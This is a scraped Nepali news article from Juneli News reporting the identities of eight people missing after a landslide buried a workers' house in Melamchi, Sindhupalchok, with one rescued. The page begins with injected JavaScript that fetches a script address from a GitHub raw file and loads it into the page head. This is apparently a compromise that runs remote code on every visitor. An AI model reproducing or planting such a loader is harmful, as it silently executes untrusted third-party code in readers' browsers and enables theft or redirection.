;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सिन्धुपाल्चोक पहिरो अपडेट : बेपत्ता आठको पहिचान खुल्यो – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • सिन्धुपाल्चोक पहिरो अपडेट : बेपत्ता आठको पहिचान खुल्यो
जुनेली बिशेष

सिन्धुपाल्चोक पहिरो अपडेट : बेपत्ता आठको पहिचान खुल्यो

पहिरो

साउन १९,

काठमाडौं । सिन्धुपाल्चोकको मेलम्ची–११ मा पहिरो खस्दा ८ जना बेपत्ता भएकाहरुको पहिचान खुलेको छ। एकजनाको १ जनाको जिवितै उद्धार भएको छ। निरन्तरको वर्षापछि माथिबाट आएको पहिरोले थिचेर आठ जना बेपत्ता भएका हुन्।

प्रदेश सरकारले निर्माण गर्न लागेको कभर्डहल निर्माण गर्दै गरेका कामदार बसेको घर पहिरोले पुरिएको इलाका प्रहरी कार्यालय मेलम्चीका प्रहरी प्रहरी प्रमुख प्रज्ववल महर्जनले जानकारी दिए।

पुरिएका मध्ये एक जना भारतीय र अन्य वीरगञ्जका रहेको उनले बताए। पहिरोबाट भारतिय नागरिक बारु साहको उद्दार गरि अहिले मेलम्ची प्राथमिक स्वास्थ्य केन्द्रमा उपचार भइरहेको महर्जनको भनाइ छ। बेपत्ता हुनेहरुमा वीरगञ्जका वर्ष ४२ का राजेन्द्र चौरासिया, ३५ वर्षीय प्रदिप चाैरसिया,२५ वर्षीय विक्रम थिंग,२३ वर्षीय मानबहादुर रुम्बा,२० वर्षीय सिमन घलान, २१ वर्षीय शिव बालक धामी, १७ वर्षीय सोनाम लामा र १ जना भारतिय नागरिक राजेन्द्र चौधरी रहेको उनले बताए। बेपत्ताको नेपाली सेना, नेपाल प्रहरी, सशस्त्र प्रहरी, स्थानीयबाट खोजिकार्य भइरहेको छ।

फेसबुक प्रतिक्रियाहरु